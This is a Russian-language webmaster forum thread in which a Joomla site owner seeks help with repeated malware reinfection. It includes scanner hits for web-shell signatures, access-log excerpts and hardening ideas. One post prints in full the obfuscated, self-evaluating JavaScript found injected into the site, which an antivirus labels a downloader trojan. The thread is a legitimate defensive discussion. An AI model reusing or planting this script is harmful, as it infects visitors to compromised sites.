0 Пользователей и 1 Гость просматривают эту тему.
  • 17 Ответов
  • 2142 Просмотров
*

denis174

  • Захожу иногда
  • 255
  • 1 / 0
Здравствуйте коллеги, есть проблема, сайт http://tehresurs-yug.ru/ - постоянно валится из-за какой-то вирусни... причем изначально сайт был на j1.5 - боролся с вирусами, закрывал доступ к папкам... не помогло, решил что дырка в каком-то компоненте, решил перенести все на 2.5. - переверстал шаблон, сменил часть компонентов...
Захожу на сайт и опять какая-то гадость прописалась в JS... сейчас разворачиваю бекап - попутно делаю завирусованную копию сайта, что бы посмотреть что и куда влезло, может кто даст совет как защитить сайт?
ps хостинг от sweb - сколько сайтов поднимал не было ничего подобного.
*

denis174

  • Захожу иногда
  • 255
  • 1 / 0
Akeeba Backup
JCE Administration
Joomla! Update
Phoca Download
VirtueMart
virtuemart-aio
Контакты
Ленты новостей
Перенаправление
Поиск
Сообщения
Умный поиск
*

denis174

  • Захожу иногда
  • 255
  • 1 / 0
если поставить права на файлы 444 работать  будет?
*

ShizoManiak

  • Новичок
  • 21
  • 6 / 0
Была такая проблема. Во-первых, смените пароли на фтп, проверьте комп на вирусы, во-вторых, поищите на сервере посторонние php файлы, у меня был Web Shell by oRb, под именем url.php, прятался в глубине папок, и хакер через шелл имел полный доступ к фтп.

Здравствуйте коллеги, есть проблема, сайт http://tehresurs-yug.ru/ - постоянно валится из-за какой-то вирусни... причем изначально сайт был на j1.5 - боролся с вирусами, закрывал доступ к папкам... не помогло, решил что дырка в каком-то компоненте, решил перенести все на 2.5. - переверстал шаблон, сменил часть компонентов...
Захожу на сайт и опять какая-то гадость прописалась в JS... сейчас разворачиваю бекап - попутно делаю завирусованную копию сайта, что бы посмотреть что и куда влезло, может кто даст совет как защитить сайт?
ps хостинг от sweb - сколько сайтов поднимал не было ничего подобного.
*

denis174

  • Захожу иногда
  • 255
  • 1 / 0
сканер в подписи поищи шелы

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_akeeba/views/buadmin/view.html.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_phocadownload/views/phocadownloaduserstats/view.html.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_phocadownload/views/phocadownloadusers/view.html.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_users/views/groups/tmpl/default.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_virtuemart_allinone/admin.virtuemart_allinone.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_joomlaupdate/restore.php
String:: $_POST[

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_virtuemart/views/updatesmigration/tmpl/default_tools.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_virtuemart/views/orders/tmpl/order.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/components/com_menus/views/menus/tmpl/default.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/templates/hathor/html/com_users/groups/default.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/templates/hathor/html/com_finder/filters/default.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/templates/hathor/html/com_finder/index/default.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/templates/hathor/html/com_finder/maps/default.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/administrator/templates/hathor/html/com_menus/menus/default.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/components/com_mailto/controller.php
String:: $_POST[

File: /home/t/tehresurru/tehresursru/public_html/components/com_phocadownload/views/user/tmpl/default_files.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/components/com_users/controllers/reset.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/components/com_virtuemart/controllers/cart.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/libraries/joomla/html/toolbar/button/confirm.php
String:: confirm(

File: /home/t/tehresurru/tehresursru/public_html/libraries/joomla/environment/request.php
String:: $_POST[

File: /home/t/tehresurru/tehresursru/public_html/libraries/tcpdf/pdf417.php
String:: c99

File: /home/t/tehresurru/tehresursru/public_html/libraries/tcpdf/tcpdf.php
String:: c100
*

denis174

  • Захожу иногда
  • 255
  • 1 / 0
проверил часть файлов, ничего не нашел...
*

denis174

  • Захожу иногда
  • 255
  • 1 / 0
восстановил из бекапа... там все чисто, делал на локалке, потом выгружал... главное что бы дырок в комонентах не было...
Как лучше защититься, кроме выставления прав? если кто может дать хороший совет или поделиться опытом, с радостью выслушаю
« Последнее редактирование: 10.05.2012, 14:45:55 от denis174 »
*

denis174

  • Захожу иногда
  • 255
  • 1 / 0
.htaccess
раскидать по всем папкам? кроме главной?


этого будет достаточно?
Order allow,deny
Deny from all
« Последнее редактирование: 10.05.2012, 17:03:30 от denis174 »
*

wishlight

  • Живу я здесь
  • 4144
  • 252 / 1
  • 300 руб очень быстрый хостинг в ЕС
File: /home/t/tehresurru/tehresursru/public_html/libraries/tcpdf/pdf417.php
String:: c99

File: /home/t/tehresurru/tehresursru/public_html/libraries/tcpdf/tcpdf.php
String:: c100

как появились? Аксесс лог есть?
*

denis174

  • Захожу иногда
  • 255
  • 1 / 0
File: /home/t/tehresurru/tehresursru/public_html/libraries/tcpdf/pdf417.php
String:: c99

File: /home/t/tehresurru/tehresursru/public_html/libraries/tcpdf/tcpdf.php
String:: c100

как появились? Аксесс лог есть?

217.118.95.66 tehresurs-yug.ru - - [10/May/2012:14:37:04 +0400] "GET /libraries/tcpdf/pdf417.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET4.0E)" 4612 0
217.118.95.66 tehresurs-yug.ru - - [10/May/2012:14:37:04 +0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET4.0E)" 4612 0
217.118.95.66 tehresurs-yug.ru - - [10/May/2012:14:37:08 +0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET4.0E)" 4612 0
217.118.95.66 tehresurs-yug.ru - - [10/May/2012:14:37:21 +0400] "GET /libraries/tcpdf/tcpdf.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 ( .NET4.0E)" 4612 0


ну и так далее...
193.16.101.55 tehresurs-yug.ru - - [10/May/2012:18:22:01 +0400] "GET /libraries/tcpdf/tcpdf.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19" 11572 0

больше ничего не нашел...
*

wishlight

  • Живу я здесь
  • 4144
  • 252 / 1
  • 300 руб очень быстрый хостинг в ЕС
А пораньше логов нет?
« Последнее редактирование: 10.05.2012, 20:02:21 от wishlight »
*

denis174

  • Захожу иногда
  • 255
  • 1 / 0
Ну это я был :). А пораньше логов нет?

лог ведется с 23 апреля...ничего подобного в нем нет до сегодня... да и сам вирус после переноса на новую Joomla, только сегодня заметил... думал что поборол.... а тут нефига....
*

denis174

  • Захожу иногда
  • 255
  • 1 / 0
в js содержался такой гад:

try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$51$48.5$52.5$50$49$57.5$55$49$55.5$22$55$54.5$49$60$54.5$54$49.5$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}


каспер его определяет как Trojan-Downloader.JS.Iframe.cwu
Время детектирования   09 май 2012 23:32 MSK
Время выпуска обновления   10 май 2012 01:25 MSK
*

ecolora

  • Завсегдатай
  • 1417
  • 170 / 2
  • творец
Если у Вас во всех файлах один и тот же вредоносный код, то можно применить вот это:

Поиск и замена одинаковой строки всех файлов сайта
Научу зарабатывать на сайте ->>

Давайте делать Интернет вместе!
*

denis174

  • Захожу иногда
  • 255
  • 1 / 0
Если у Вас во всех файлах один и тот же вредоносный код, то можно применить вот это:

Поиск и замена одинаковой строки всех файлов сайта

я уже справился, спасибо.

Вопрос только в том как сделать что бы не было повторений
*

denis174

  • Захожу иногда
  • 255
  • 1 / 0
история повторяется заново....
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как опубликовать на сайте отзывы с карточки компании Яндекс.карт?

Автор Sensession

Ответов: 0
Просмотров: 182
Последний ответ 21.04.2018, 21:42:17
от Sensession
Убрать папку с URL при помощи файла .htaccess

Автор Nishtiak

Ответов: 12
Просмотров: 10437
Последний ответ 24.02.2018, 16:59:44
от kern.USR
ошибка при неправильной авторизации на сайте

Автор akondr

Ответов: 6
Просмотров: 606
Последний ответ 25.11.2017, 22:22:50
от akondr
Вирус. Редерикт на другой сайт

Автор net33

Ответов: 12
Просмотров: 1141
Последний ответ 31.10.2017, 09:54:41
от SeBun
Появился левый текст на сайте

Автор vipopo

Ответов: 25
Просмотров: 978
Последний ответ 30.06.2017, 13:52:52
от dmitry_stas